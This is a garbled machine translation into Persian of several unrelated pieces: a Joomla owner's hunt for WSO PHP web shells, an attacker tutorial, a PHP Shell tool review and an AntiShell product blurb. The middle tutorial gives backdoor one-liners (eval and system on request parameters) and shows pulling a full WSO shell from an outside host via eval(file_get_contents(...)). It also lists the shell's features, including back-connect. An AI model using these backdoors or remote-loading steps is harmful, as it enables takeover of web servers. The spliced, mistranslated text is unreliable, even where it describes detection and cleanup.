به عنوان Antishell Web Shell Hunter کمک می کند تا به جستجوی پوسته های وب مخرب جستجو کنید. اسکریپت پوسته پوسته پوسته پوسته پوسته پوسته پوسته پوسته - که در آن پاها از چه پوسته وب رشد می کنند

Malicious WSO PNR Shell-Script / Librurseys/simplepie/idn/openidopenid.php (سایت جوملا! 3) یافت. در این لحظه تعیین شده تنها توسط برخی از آنتی ویروس ها مانند JS / SARS.S61، PHP: decode-de، trojan.html.agent.vsvbn، php.shell.shell.unclassed.359.unofficial.

در یک "زیبا" (که کسی به عنوان)، یکی از بخش های ما (http://ladynews.biz)، به عنوان یک نتیجه از اسکن سایت شما، میزبانی آنتی ویروس، دریافت چنین پیام:

انفجار فایل های شناسایی شده با محتوای مخرب. ما به شدت توصیه می کنیم محدودیت دسترسی به حساب FTP را تنها با استفاده از آدرس های IP، و همچنین استفاده کنید حفاظت از ضد ویروس برای بررسی حساب برای ویروس ها. خواندن توصیه های ایمنی مقاله و حفاظت هک برای جلوگیری از عفونت مجدد.

البته، پیشنهاد شده بود که با این نگرش، اسکن آنتی ویروس منظم Clamav، با مجموعه ای از پایگاه های ضد ویروس به طور پیش فرض، یک نتیجه اضافی را ارائه نداد.

در زمان شروع این داستان (2015-10-23)، این اسکریپت ویروسی پوسته در پایگاه داده های ضد ویروس بسیاری از آنتی ویروس ها از جمله "هیولا" به عنوان Comodo، DrWeb، ESET-NOD32، GDATA، Kaspersky، McAfee، وجود نداشت مایکروسافت، سیمانتک، Trendmicro و غیره، که همچنین 2015-10-23 توسط اسکنر آنلاین VirusTotal تایید شد. فقط چند آنتی ویروس توانستند اسکریپت PHP مخرب را تعیین کنند:

نتیجه آنتی ویروس Refresh Date Ahnlab- V3 JS / SARS. S61 20151022 Avast PHP: Decode- de [Trj] 20151023 نانو آنتی ویروس تروجان. HTML عامل. vsvbn 20151023.

در همان روز، CLAMAV و DR.BEB در مورد تشخیص یک اسکریپت مخرب مطلع شدند. Clamav هنوز به شدت سکوت می کند، و Dr.Web به مدت 24 ساعت به یک بسته مخرب پاسخ داد:

درخواست شما مورد تجزیه و تحلیل قرار گرفت. ورودی مربوطه به پایگاه داده ویروسی Dr.Web اضافه می شود و در بروز رسانی بعدی در دسترس خواهد بود.

تهدید: php.shell.354.

Dr.Web وعده خود را حفظ کرد و اسکریپت ویروس OpenIdopenIDIDID.php در حال حاضر به عنوان php.shell.354 تعریف شده است، اما بسیاری از آنتی ویروس ها مانند Clamav، Comodo، DRWEB، ESET-NOD32، GDATA، Kaspersky، McAfee، مایکروسافت، سیمانتک، Trendmicro و غیره . ص.، هیچ ایده ای در مورد آن ندارد (از 2015-10-25).

خوب، ما فایل را حذف کردیم، و شما برای مدت طولانی؟ از کجا آمده است، ما فقط می توانیم حدس بزنیم. بعدا چی؟ ما شروع به قرار دادن انواع اجزای امنیتی چک و پیچ و خم قوانین v.htaccess ممنوع دسترسی به همه چیز و همه برای میزبانی مشترک (AKA میزبانی مجازی، میزبانی مشترک) به بزرگتر ما هیچ قدرت نداریم. برای چه مدت این اقدامات صرفه جویی کنید، هیچ کس نمی داند.

به هر حال در مورد تمام اجزای امنیتی نگهدارنده ... SecurityCheck جزء جوملا است! و خیلی خوب است اما یک "حفاظت از وب سایت های آنتی ویروس" کاملا متوقف می شود که قطعا از هر کسی استفاده می کنم، در اینجا یک بررسی عمل تایید شده در مورد این "حفاظت از وب سایت آنتی ویروس" است:

این جزء همچنین یک فایل pack.tar را در TMP خود ایجاد می کند که شامل پیکربندی شما می باشد، و هر کلمه عبور دیگر یافت می شود! آگاه باشید

که در ترجمه به این معنی است: "این جزء نیز ایجاد می کند پشتیبان گیری مجموع سایت در /tmp/pack.tar، که شامل configuration.php با گذرواژه پایگاه داده است! مراقب باشید "- این نشان می دهد که" حفاظت از وب سایت "از این مولفه بوی نمیکند، که باید قربانی را به فکر تغییر راه ها به دایرکتوری / سیاههها، / TMP، / Cache و ممنوعیت دسترسی به آنها برساند.

عبور از این لینک را می توان درک کرد که مشکل حداقل بیش از یک سال است. به دنبال اینجا، ما درک می کنیم که ماسک کردن اسکریپت طلسم سینما Base64_Encode / Gzdeflate ساخته شده است، به این معنی که جایی دیگر باید بخشی از تماس / پلاگین OpenIdopenID.php و انجام base64_decode / gzinflate باشد. بنابراین openIdopenIdid.php تنها نتیجه (به عنوان مثال نتیجه)، و نه دلیل آن که قربانی شکایت می کند، از سرور، شروع به ارسال هرزنامه در مقیاس صنعتی از سرور، و حذف دستی فایل های مخرب کمک نمی کند، پس از آن قربانی علاوه بر میزبانی NIC-RU برای شکایت هیچ کس دیگری نیست. میزبانی مجازی "Holey" ممکن است بسیار خوب باشد. حتی اغلب مردم IMHO برای S / N کار می کنند و نه برای این ایده، بلکه در برخی موارد، مشکل می تواند به طور قابل توجهی عمیق تر باشد.

در اینجا به عنوان مثال، "فایل فلش Adobe Flash شناسایی انژکتور مخرب iFrame را تشخیص داد. من فکر می کنم این راز نیست که شما می توانید رابط کاربری را برای دانلود فایل ها به سایت بنویسید و بسیاری از چیزهای جالب در زبان ActionScript را ایجاد کنید. v.swf فایل ویروس ( فلاش ادوبی)، همانطور که عمل نشان داده است، می تواند سال های غیر قابل توجه باقی بماند و یک درب سیاه در سایت باشد ( درب عقب درب - درب عقب) که از طریق آن فایل هایی مانند "OpenIdopenID.php" را می توان قبل از تشکیل و بدون فایده حذف کرد.

چه کاری باید انجام دهید، چگونه هزاران فایل "لینک ضعیف" را پیدا کنید؟ برای انجام این کار، شما باید از تجزیه و تحلیل به اصطلاح اکتشافی استفاده کنید و در برخی موارد برای استفاده از پایگاه های ضد ویروس توسعه دهندگان شخص ثالث استفاده کنید. لازم به ذکر است که تجزیه و تحلیل اکتشافی، بسته به تنظیمات آن، می تواند بسیاری از مثبت کاذب را نسبت به استفاده از امضاهای ویروسی اضافی از توسعه دهندگان شخص ثالث ارائه دهد.

از کجا پایگاه داده های ضد ویروس توسعه دهندگان شخص ثالث دریافت کنید؟ به عنوان مثال، پایگاه های داده با امضا های ضد ویروس از توسعه دهندگان شخص ثالث برای CLAMAV، شما می توانید به صورت رایگان در آدرس ها رایگان: www.securiteinfo.com، malwarepatrol.net، rfxn.com. نحوه استفاده از این پایگاه های آنتی ویروس اضافی؟ این یک داستان دیگر خواهد بود. شما فقط می توانید بگویید که پایگاه های داده های ضد ویروس اضافی برای CLAMAV از RFXN.com (پروژه LMD (LINUX MALWARE DETECT)) به منظور پیدا کردن یک مخرب به طور خاص در برنامه های وب و نتایج موفق تر را هدف قرار می دهند. RFXN.com همچنین اعلام می کند که 78 درصد از تهدیداتی که چاپ آنها در پایگاه داده آنها شامل بیش از 30 ضد ویروس تجاری نیست، و به احتمال زیاد آن است.

بنابراین ... چه چیزی داستان را با یک اسکریپت RNR-Shell مخرب OpenIdopenid.php به پایان رسانده است؟

تصمیم گرفت به ذخیره پایگاه های اضافی آنتی ویروس برای Clamav از MalwarePatrol.net و RFXN.com، دانلود یک نسخه پشتیبان از فایل های سایت بله، اسکن آن را به صورت محلی، در اینجا نتیجه اسکن:

$ clamscan / ladynews.biz / ../ game_rus.swf: mbl_647563.unofficial یافت / .. farmfrenzy_pp_rus.swf: mbl_647563.unofficial یافت شده / ../ beachpartycraze_rus.swf: mbl_2934225.unofficial یافت شده / .. hollydeluxe_rus.swf: mbl_647563.unofficial یافت / ../ loader_rus.swf: mbl_647563.Unofficial found ----------- خلاصه اسکن ----------- ویروس های شناخته شده: 4174348 نسخه موتور: 0.98.7 دایرکتوری های اسکن شده: 3772 فایل های اسکن شده: 18283 فایل های آلوده: 5 کل خطاها: 1 داده های اسکن شده: 417.76 MB داده ها خوانده شده: 533.51 مگابایت (نسبت 0.78: 1) زمان: 1039.768 ثانیه (17 متر 19 ثانیه)

/librurseys/simplepie/idn/openidopenid.php. همانطور که فایل های فوق ذکر شده است .swf حذف شده اند، اما آیا یک مشکل وجود دارد؟ هنوز هم دشوار است بگویم، - حفاری بیشتر ...

از نسخه رمزگشایی فایل /librurseys/simplepie/idn/openidopenid.php. (http://pastebin.com/wrlrlg9b)، نگاهی به دائمی define ("wso_version"، "2.5")؛ روشن می شود که این یک محصول به نام WSO است. شبکه کمی ترسناک برای کلمه کلیدی WSO، این نتایج است:

موضوع به مدت طولانی جدید نیست، خوب، ما را به دندان های regexxer دندان ها، ما همچنان به سرعت بخشیدن به فایل های سایت و تشخیص: خطا در باز کردن دایرکتوری "/ صفحه اصلی / کاربر / کتابخانه ها / جوملا / حافظه پنهان / کنترل / کش": غیر فعال شده است

بله، در اینجا شما S.KO جایی که دیگر دیده می شود! ما به سمت راست به دایرکتوری نگاه می کنیم، که نباید به طور پیش فرض باشد \u003d Chmod 111 (AKA برای مالک / گروه / همه اجرا می شود). بنابراین، چیزی در جایی نشسته و خود را در کاتالوگ ها پنهان می کند حتی از ویروس ها Chmodami 111 پنهان می شود.

نصب شده برای کاتالوگ Chmod 551 و در داخل نگاه کرد، کشف شد /librursees/joomla/cache/controller/cache/cache/langs.php., منبع که در اینجا جذب می شود: http://pastebin.com/jdtwpxjt - کاتالوگ / کتابخانه ها / جوملا / حافظه پنهان / کنترل / کش ما حذف می کنیم

عالی، در حال حاضر ما به منظور تمام فایل ها و کاتالوگ ها قرار می دهیم:

# تغییر جرم حقوق (chmod) در فایل ها در دایرکتوری. / dirname و پایه پیدا کردن / صفحه اصلی / کاربر / public_html -type f -exec chmod 644 () \\؛ # تغییر جرم حقوق (chmod) بر روی c / dirname و پایه پیدا کردن / صفحه اصلی / کاربر / public_html -type d -exec chmod 755 () \\؛

ما بار دیگر آزمون آنتی ویروس را با پایه های اضافی Clamscan /Ladynews.biz تکرار می کنیم، اما ادعا می شود همه چیز تمیز است.

جستجو برای فایل های regexxer را تکرار کنید و سعی کنید جستجو کنید کلید واژه ها Openidopenid، OpenId یا WSO - و ما به این نتیجه رسیدیم که P. Zdez تبدیل به خیلی بیشتر و عمیق تر شد:

  • - این نباید اینجا باشد، در اینجا منبع آن است: http://pastebin.com/jyeizy9g
  • /administrator/components/com_finder/controllers/imagelist.php. - این نباید اینجا باشد، در اینجا منبع آن است: http://pastebin.com/0uqdrmgv
  • /administrator/components/com_users/tables/css.php. - این نباید اینجا باشد، در اینجا منبع آن است: http://pastebin.com/8qntsyma
  • /administrator/templates/hathor/html/com_contact/contact/toolbar.trash.html.php. - این نباید اینجا باشد، در اینجا منبع آن است: http://pastebin.com/ctvuzsiz
  • /components/com_jce/ditor/tiny_mce/plugins/link/img/manager.php. - نباید اینجا باشد، در اینجا منبع آن است: http://pastebin.com/2nwtncxx
  • /librursees/joomla/application/Web/ROuter/Helpsites.php. - این نباید اینجا باشد، در اینجا منبع آن است: http://pastebin.com/anhxyvl9
  • /plugins/system/ytshortcodes/xml.php. - این نباید در اینجا باشد، در اینجا منبع آن است: http://pastebin.com/gnmsdfc9
  • /templates/index.php - نباید اینجا باشد، در اینجا منبع آن است: http://pastebin.com/ghbmef2t

/administrator/components/com_admin/index.php. و / /templates/index.php احتمالا اسکریپت های ورودی بود که در آن کد اصلی با استفاده از تابع Eval () انجام شد که توصیه نمی شد از آن استفاده کنید:

خوب، منطق پنهان کردن کد مخرب روشن است. در حال حاضر، اگر ما به دنبال طراحی "Eval ($"، ما بسیاری از چیزهای جالب پیدا کنید:

  • /administrator/components/com_admin/sql/updates/postgresql/php.php. - http://pastebin.com/grhvxt5u
  • /components/com_kunena/template/blue_eagle/media/iconsets/buttons/bluebird/newsfeed.php. -
  • /components/com_mailto/helpers/index.php. -
  • /components/com_users/views/login/file.php. -
  • /components/com_users/controller.php. - آلوده و نیاز به جایگزینی!
  • /includes/index.php -
  • /librursees/joomla/string/wrapper/section.php. -
  • /librurses/egcy/access/directory.php. -
  • /librurseys/nextend/javascript/jquery/inputfilter.php. -
  • /librurses/nextend/smartslider/admin/views/sliders_slider/tpl/config_tinybrowser.php. -
  • /librurseys/xef/assets/less/admin.frontpage.php. -
  • / media/ditors/codemirror/mode/rust/alias.php. -
  • /modules/mod_kunenalates/language/zhh-tw/smtp.php. -
  • /modules/mod_kunenalogin/language/de-de/xul.php. -
  • /plugins/content/jw_allvideos/jw_allvideos/includes/js/mediaplayer/skins/bekle/credits.php. -
  • /templates/sj_news_ii/html/mod_sj_contact_ajax/toolbar.messages.php. -

نه همه اسکریپت های دیگر ویروس RNP در PasteBin.com به مدت 24 ساعت ارسال می شوند تنها 10 نشریه مجاز هستند. به طور کلی، سفارش حذف تقریبا به شرح زیر است:

بله، من تقریبا فراموش کردم، - قبل از شروع به حذف اسکریپت های مخرب، آن را جلوگیری از اضافه کردن v.htaccess چند قاعده ممنوعیت دسترسی مستقیم به فایل های any.php در هر دایرکتوری، اما اجازه می دهد فایل های ریشه تنها / یا /index.php و / مدیر / یا / administrator/index.php - این پارس در مهاجم مخالف دسترسی به اسکریپت های امپراطوری ورودی پنهان در دایرکتوری های مختلف سیستم است:

به روز رسانی 2015-10-28: خب، چی؟ آیا شما در حال حاضر استراحت؟ خیلی زود است...

در حال حاضر هنوز در زمینه فایل های سایت نگاه کنید فایل های دودوییکه در موتور نباید در مامان باشد:

پیدا کردن / MyPath / -Exective -Type F Find / MyPath / -Type F -Perm -u + X Find / Mypath / -Type F | فایل XARGS | grep "\\: \\ * داده $"

چه کسی جستجو می کند - او همیشه پیدا خواهد کرد (فایل های باینری):

  • /modules/mod_p30life_expectancy_calc/tmpl/accordian.pack.js.
  • /images/stories/Audio/34061012-B1BE419AF0B9.MP3
  • /librurseys/xef/sources/folder/navigation.php.
  • /librurseys/joomla/application/Web/Application.php.
  • /librurses/joomla/document/json/admin.checkin.php.
  • /librurses/nextend/assets/css/licenseseses.php.
  • /librursees/fof/config/domain/toolbar.categories.html.php.
  • /librurses/fof/form/field/client.php.
  • /librurseys/phputf8/sysinfo_system.php.
  • /components/com_mobilejoomla/index.php.
  • /components/com_mobilejoomla/sysinfo_system.php.
  • /components/index.php.
  • /components/com_banners/sysinfo_config.php.
  • /components/com_kunena/views/home/admin.checkin.php.
  • /components/com_jce/editor/tiny_mce/plugins/source/js/codemirror/toolbar.checkin.php.
  • /components/com_jce/plugins/colorpicker/admin.cache.php.

مناسب

جایی که پاها از این عفونت آمده بودند، به طور قابل اعتماد امکان پذیر نبودم که آیا آسیب پذیری بحرانی اخیرا در موتور به شما اجازه می دهد تا تزریق SQL را انجام دهید و امتیازات را افزایش دهید، آیا موارد فوق ذکر شده به عنوان فایل های مخرب .swf یا هنوز هنوز تا به حال تا به حال تا به حال به آسیب پذیری در یکی از اجزای شخص ثالث یا پلاگین ها، یا میزبانی وب مجازی Holey، هنوز باز نشده است؟

در حال حاضر، فایل های مخرب تشخیص داده شده تمیز می شوند، فایل های موتور به طور کامل بارگیری می شوند، Barricades توسط قوانین v.htaccess ساخته شده است ... چه کسی زمان دارد و علاقه مند به جمع آوری با هم و صاف کردن این دسته از shit شما می توانید WSO-PHP را دانلود کنید -Shell-in-joomla.zip - تمام فایل های RNR مخرب فوق ذکر شده، رمز عبور از بایگانی: www.sype

مجموع: ParAbania اتفاق نمی افتد، و هر آنتی ویروس آزاد یا تجاری با اکتشافات خود، همراه با پایگاه های امضای اضافی، نه یک panacea. در نتیجه، هر ضد ویروس یک ابزار قدیمی برای حفاظت از یک محیط چند نفره فعال و جلوگیری از تهدیدات مختلف ناشناخته است، روش های حفاظت پارارانوئید، به عنوان مثال: مجازی سازی، SELinux، Bastille لینوکس، بیت غیر قابل تغییر، ecryptfs و غیره!

  • تهدید: WSO PHP وب پوسته
  • قربانی: Ladynews.biz

نه این مقاله، اما بسیاری از آنها مفید خواهند بود. بنابراین، ما به پنل مدیریت نفوذ کردیم، ما در نهایت توانستیم چنین کد را در جایی بخوریم، مثلا:

اگر (isset ($ _ درخواست ["e"])) eval (stripslashes ($ _ درخواست ["e"]))؛


یا به سادگی:

ادعا (StripsLashes (درخواست $ _))؛


stripslashes در این مورد، به طور انحصاری برای دور زدن magic_quotes \u003d در
بسیاری از آنها وارد شده اند

سیستم ($ _ ["CMD"])

و دیگر نارضایتی، اما همه چیز خیلی زیاد است، در واقع، همه چیز ساده تر است. بنابراین، شما این کد را در جایی قرار دادید (در faq.php، یا شما قبلا به سادگی چنین Befdor را در جایی در اعماق اسکریپت های سرور تایپ کرده اید).
کسانی که. به عنوان مثال، به عنوان مثال، به عنوان مثال سلامت این لینک را به دست آوردید:

http: //localhost/user.php؟ e \u003d phpinfo ()؛


و پس از آن، بسیاری از مبتدیان استپور. بلافاصله سوال بعدی - چه باید بکنید؟
و بیایید نگاهی به این phpinfo که ما راه اندازی کرده ایم، دو نقطه اصلی که ما در این وضعیت علاقه مند خواهیم بود:

allow_url_fopen
allow_url_include.

allow_url_include.

بله، قلع، البته، اما، به عنوان یک قانون، خاموش است.

باقی

و او، به عنوان یک قانون \u003d در. چگونه می توانیم از این فرصت استفاده کنیم، بی پروا توسط admin باقی مانده است، به خصوص به خصوص (به دنبال پوشه های موجود در رکورد و بدون مزاحمت برای پیدا کردن و نه برای پر کردن پوسته در همه، اما من دوست دارم صعود در سرور) بله، بسیار ساده است. اگر یک

allow_url_fopen \u003d on

و شما یک کد دارید که حداقل در نظر گرفته شده است، شما قبلا تمام پیکربندی را خوانده اید، همه چیز را که نیاز دارید، ادغام می کنید و غیره (با "سفارشی" اشتباه نکنید، فقط می توانم بخوانم)

آخرین پوسته را از عمق نگه دارید orb، خط اول را حذف کنید:

+
ما دوم را حذف می کنیم
+
شما می توانید رمز عبور را حذف کنید، پوسته را پر نمی کند، فقط استفاده نکنید، نه ترک کنید

نگه داشتن در هر میزبان به عنوان bla_bla.txt (همان narod.ru کاملا مناسب است) و یا به صورت یک عکس در یک سرویس به اشتراک گذاری فایل ارائه لینک مستقیم به پرش محتوا و ایجاد چنین درخواست:
کد:

http: //localhost/user.php؟ a \u003d eval (file_get_contents ("http://site.ru/bla_bla.txt")؛


همه چيز. شما یک پوسته کامل بدون نفوذ فیزیکی بر روی سرور با تمام امکانات معمول پوسته دارید. از توجه شما سپاسگزارم
PS: تست شده در wso2.4 ( wso2_pack.php.)

شرح شل:
مجوز
اطلاعات سرور
مدیر فایل (کپی، تغییر نام، حرکت، حذف، chmod، لمس، ایجاد فایل ها و پوشه ها)
نمایش، hexview، ویرایش، Davnotad، فایل appead
کار با آرشیو های زیپ (بسته بندی، باز کردن)
کنسول
مدیر SQL (MySQL، Postgresql)
اجرای کد پی اچ پی
کار با ردیف + جستجو hesha در پایگاه های آنلاین
Bindport و Beck Connect (Perl)
متن جستجو در فایل ها
* nix / windows
از چیپس
Antipoiskovik (بررسی کاربر عامل اگر موتور جستجو پس از بازگشت 404 خطاها)
کنسول دستورات وارد شده را به یاد می آورد. (شما می توانید از طریق آنها با فلش های بالا حرکت کنید، زمانی که روی زمینه ورودی تمرکز کنید)
شما می توانید از AJAX استفاده کنید
وزن کم (24.32 کیلوبایت)
کدگذاری را انتخاب کنید که در آن پوسته کار می کند.

این ابزار یک رابط وب برای کار از راه دور با سیستم عامل و خدمات / شیاطین آن را فراهم می کند.
استفاده از این محصول در اهداف غیرقانونی با مسئولیت های کیفری مواجه است.

بایگانی شامل آخرین نسخه پوسته و یک ابزار Wsomanager کوچک است - برای کار با پوسته ها.

دانلود پوسته:

به تازگی، در گستره وسیعی از اینترنت، من به ذکر " پوسته PHP"چند سال پیش، این ابزار به من کمک کرد بسیار زیاد بود و اکنون میخواهم وظیفه ای را به توسعه دهنده خود مارتین گیزلر (http://mgeisler.net/) ارائه دهم.

هدف "PHP Shell" چیست؟ من معتقدم که هر برنامه نویس پیشرفته وب، به جز sysadmina، به ذکر است، در سراسر و استفاده از SSH. SSH به ما اجازه می دهد تا دسترسی از راه دور به سرور را دریافت کنیم و یک فرمان Shell را بر روی آن انجام دهیم (خوب، همه انواع دستورات مانند راه رفتن در کاتالوگ ها وجود دارد، بالا، حرکت، حذف و کپی فایل ها، اجرای سناریوها و تمامی ابزار Sortsage وجود دارد )، به طوری که سیم به مانیتور خود را از واحد سیستم به اندازه های باور نکردنی طول می کشد و در حال حاضر، به سرور میزبان. من باید بگویم که از طریق SSH به تونل زنی و X-Graphics، یک تصویر دسکتاپ، نشان می دهد برنامه های کاربردی پنجره در حال اجرا، اما این به وضوح برای سرورهای وب نیست.

به طور خلاصه، اگر شما هیچ SSH در میزبانی ندارید، پس "چه چیزی در پادشاهی دانمارکی خوب نیست". منفی است، اغلب SSH به طور پیش فرض بر روی سایت "تازه" شما غیرفعال است و زمان زیادی را صرف آرامش با سرویس پشتیبانی می کند تا SSH به دست آورده است. این دقیقا همان چیزی است که در آن شب زمستان دور افتاده است. من نیاز به فورا سایت را از یک دستگاه به دیگری انتقال می دهم، در طی چه مشکلاتی، و من برای رسیدن به برچسب بتونه بر روی دسکتاپ استفاده می شود، به طوری که در بیمار "داخل" وجود دارد. اوه ... پشتیبانی SSH فعال نیست. چگونه باید باشیم؟ اگر شما به اندازه کافی در برنامه نویسی در برخی از زبان ها وسوسه می شوید، یک اسکریپت کوچک را که کار لازم را اجرا می کند، دشوار نخواهد بود. من گوگل را باز کردم و در اطراف جفت لینک ها در حال اجرا هستم، من اشاره به پوسته PHP را پیدا کردم. در یک کلمه، من به موقع رفتم.

در حقیقت، من خیلی خوش شانس بودم که ما به اندازه کافی از این فرصت های قطع شده برای کار با پوسته داشتیم، که من را با PHP Shell - هنوز تقلید او بود.

در قلب پوسته PHP خود از عملکرد پی اچ پی استفاده می کند - Proc_Open. این ویژگی برخی از فرمان را آغاز می کند و جریان های ورودی خروجی را باز می کند تا اطلاعاتی را به یک برنامه وارد کند (تقلید از ورودی دستی به عنوان آن را روی صفحه کلید قرار می دهد) و نتایج کار را نشان می دهد (اگر می دانید چه لوله ها در مورد آنها صحبت می کنند) . در واقع، عملکرد Proc_Open یک نسخه بهبود یافته و تقویت شده از ویژگی های EXEC یا سیستم است. این ها، حقیقت فقط این برنامه را راه اندازی کرد و به شما اجازه نمی دهد که با آن ارتباط برقرار کنید، باید بلافاصله در پارامترهای خط فرمان برای مشخص کردن تمام داده های عملیاتی که نیاز دارید مشخص کنید. Proc_Open به شما اجازه می دهد تا لوله های مرتبط با PHP Skipte خود را ایجاد کنید و می توانید با ورود اطلاعات به برنامه مطابقت داشته باشید و نتایج حاصل از آن را بخوانید. برای دوستداران میزبانی رایگان، من بلافاصله می گویم:

"نه، با پوسته PHP، شما قادر به دسترسی به SSH نخواهید بود."

واقعیت این است که برای میزبانی رایگان یا بسیار ارزان میزبانی میزبانی وب، شما باید PHP را در حالت safe_mode اجرا کنید. این تعدادی از توابع را شامل می شود، از جمله proc_open.

"نه، با phpshell، شما قادر نخواهید بود با برنامه های تعاملی کار کنید."

ماهیت وب به ما می گوید که امکان اجرای یک برنامه خاص وجود ندارد که ادامه کار بر روی یک سرور از راه دور، که همچنان به کار ادامه می دهد و به ما اجازه می دهد اطلاعات را برای چندین درخواست HTTP جداگانه وارد و خروجی کنیم.

"نه، شما نمی توانید به تمام برنامه ها، فایل ها و پوشه ها بر روی سرور دسترسی پیدا کنید."

این اسکریپت به نمایندگی از آپاچی کار می کند و پس از آن توانایی های آن تنها به حقوق مربوط به حساب Apache محدود می شود. یا به عنوان یک گزینه اگر Suexec در میزبانی استفاده شود (http://en.wikipedia.org/wiki/suexec)، پس از آن حقوق شما با حساب کاربری که اسکریپت پی اچ پی در حال اجرا است، هماهنگ خواهد شد.

فرض کنید که شما را متوقف نمی کند، و شما بایگانی بر روی سرور خود را به پوشه، می گویند، PHPSHELL. اگر شما به نوار آدرس مرورگر "به نحوی که به نام وب سایت شما / PHPSHELL / PHPSHEL.php" وارد می شوید، از شما خواسته می شود خود را معرفی کنید، نام و رمز عبور را وارد کنید، البته این مدارکتی نیست که از شما دریافت کردید هوشیار کردن

بنابراین شما نیاز به پیکربندی حقوق دسترسی دارید: چه کسی می تواند از طریق این ابزار به پوسته دسترسی پیدا کند. برای انجام این کار، در فایل config.php، بخش کاربران را پیدا کرده و یک نام کاربری و رمز عبور را به آن اضافه کنید:

vasyano \u003d راز

اگر شما با این واقعیت اشتباه گرفته اید که رمز عبور در فرم باز تنظیم شده است، سپس با استفاده از فایل PHWHASH.php، شما می توانید سفر رمز عبور MD5 را پیدا کنید و در فایل config.php ذخیره می شود

در حال حاضر ما یک ورودی مجدد را وارد می کنیم و پنجره را وارد می کنیم، جایی که در پایین پنجره ما فرمان را وارد می کنیم، روی «اجرای» کلیک کنید و سپس نتیجه اجرای آن در مرکز پنجره صفحه نمایش داده می شود

در این مورد، همه چیز، شاید phpshell به نحوی به شما کمک کند.

اکثر حملات به منابع شرکت های بزرگ، معرفی پوسته های وب - کد است که امکان مدیریت دستگاه های آسیب دیده را از خارج از شبکه فراهم می کند. Antishell Web Shell Hunter یک عامل محافظتی است که شامل مجموعه ای کامل از مکانیسم ها برای شناسایی پوسته های وب است.




پوسته وب یک اسکریپت است که به سرور بارگیری می شود و به مدیریت از راه دور عمل می کند. این تنها زمانی که مهاجم را کنترل می کند، مخرب می شود. و در این مورد، او یک تهدید جدی را نشان می دهد.

سرور آلوده لازم نیست به اینترنت متصل شود - می توان آن را در شبکه داخلی شرکت قرار داد. سپس پوسته وب برای دسترسی به میزبان های دیگر با برنامه های کاربردی یا اطلاعات حیاتی استفاده می شود.

برای نوشتن پوسته های وب، هر زبان پشتیبانی شده توسط وب سرور هدف مورد استفاده قرار می گیرد. در عمل، PHP و ASP اغلب مورد استفاده قرار می گیرند، زیرا محبوب ترین آنها هستند. همچنین برنامه های مخرب را در پوسته Perl، Ruby، Python و Unix گسترش دهید.

پوسته های وب استاندارد استاندارد برای برنامه های مخرب در روش نصب شده اند - استفاده از آسیب پذیری ها در CMS یا نرم افزار وب سرور. پس از آن، آنها به عنوان یک پشت سر هم کار می کنند، که به مهاجم اجازه می دهد تا دستورات دلخواه را بر روی یک دستگاه از راه دور انجام دهد، از جمله برای معرفی نرم افزار Extortable یا شروع به حملات به سرورهای دیگر.

خطر ویژه پوسته های وب سادگی نسبی آنهاست. اصلاح اسکریپت، که منجر به برنامه دیگری می شود، وظیفه ای است که حتی یک مبتدی می تواند مقابله کند. به دلیل این کیفیت، تشخیص پوسته پوسته با امکانات استاندارد ضد ویروس دشوار است.

مانند سایر برنامه های مخرب، پوسته های وب را می توان برای تعدادی از نشانه های خارجی شناسایی کرد. با این حال، بخش قابل توجهی از آنها نیز می تواند مربوط به فایل های کاملا قانونی باشد، بنابراین هر شاخص مشکوک باید در مجتمع، تجزیه و تحلیل کل تصویر، و نه قطعات آن در نظر گرفته شود.

شاخص های احتمالی حضور پوسته وب در سرور می تواند باشد:

  • دوره های بار غیر طبیعی بالا بر روی سرور؛
  • حضور فایل ها با یک زمانبندی مشکوک (به عنوان مثال، بعد از زمان آخرین به روز رسانی نرم افزار)؛
  • در دسترس بودن فایل های مشکوک در مکان های موجود از اینترنت؛
  • حضور فایل هایی که در آن مراجع به CMD.EXE، EVAL و غیره وجود دارد؛
  • در دسترس بودن مجوز مشکوک از شبکه داخلی؛
  • حضور فایل هایی که ترافیک را از دست می دهند، تولید می کنند.

بدیهی است، تجزیه و تحلیل "دستی" در این مورد، در صورت امکان، نیاز به منابع انسانی زیادی دارد، بنابراین استفاده از آن از هر امکان عملی محروم شده است. Antishell Web Shell Hunter، توسعه یافته توسط تکنولوژی Garhi، به شما اجازه می دهد تا این روش را خودکار کنید، و توسعه دهندگان آن استدلال می کنند که تضمین شده است که همه پوسته های وب شناخته شده را تشخیص دهد.

این برنامه بر اساس فناوری های زیر است:

  • جستجو بر اساس کلمات کلیدی تمام فایل ها برای کلمات و دستورات مورد بررسی قرار می گیرند که ممکن است با یک حمله مرتبط باشد؛
  • تجزیه و تحلیل سیگنال: جستجو برای امضا از پوسته های شناخته شده وب؛
  • تجزیه و تحلیل طولانی ترین خطوط. اغلب کد مخرب به گونه ای رمزگذاری شده است تا از جستجوی کلمات کلیدی دور شود. این باعث می شود ردیف کد به ویژه طولانی، که به آنها اجازه می دهد آنها را شناسایی کنند؛
  • محاسبه آنتروپی شانون در کد منبع. هر ردیف کد یک امتیاز اختصاص داده شده است، بر اساس آن می تواند درجه تهدید را قضاوت کند؛
  • جستجو برای کد مخرب با روش تصادفی شاخص.

این یکی از مشکلات اصلی تشخیص پوسته های وب مرتبط با انواع زبانهای مورد استفاده و امکان اصلاح ساده را حل می کند. در کار شکارچی پوسته پوسته Antishell، این عوامل در هر نقطه تاثیر نمی گذارد، که آن را جهانی می کند و به شما اجازه می دهد تا از هر سرور محافظت کنید.

از آنجا که فایل هایی که پس از اسکن قبلی تغییر نکرده اند، از پردازش خارج می شوند، AntiShell Web Shell Hunter بارگذاری بالا بر روی سرور ایجاد نمی کند. علاوه بر این، این رویکرد زمان چک را کاهش می دهد.

در عین حال، مدیران می توانند به طور مستقل زمان چک را بر اساس نوسان روزانه بارگذاری بر روی سرور تنظیم کنند. در صورت لزوم، حالت روزانه به صورت هفتگی یا حتی ماهانه جایگزین می شود، که به شما امکان می دهد عملیات کل سیستم را بهینه سازی کنید.

این برنامه فایل های حاوی کد وب پوسته را تشخیص می دهد و مدیر سیستم را با اطلاعات کامل در مورد شیء فراهم می کند: تاریخ و زمان خلقت، نام مالک، حق و غیره.

تمام این داده ها (اما نه فایل ها خودشان) همچنین مرکز مشتری مشتری توسعه دهنده را وارد می کنند، که بر اساس آنها می تواند حمایت از پردازش حادثه و مطالعه عواقب آن را فراهم کند. مشتریان امضا شده توسط خدمات پرداخت شده همچنین می توانند از ابزار ویژه برای دانلود فایل های آلوده خود برای تجزیه و تحلیل بیشتر استفاده کنند.

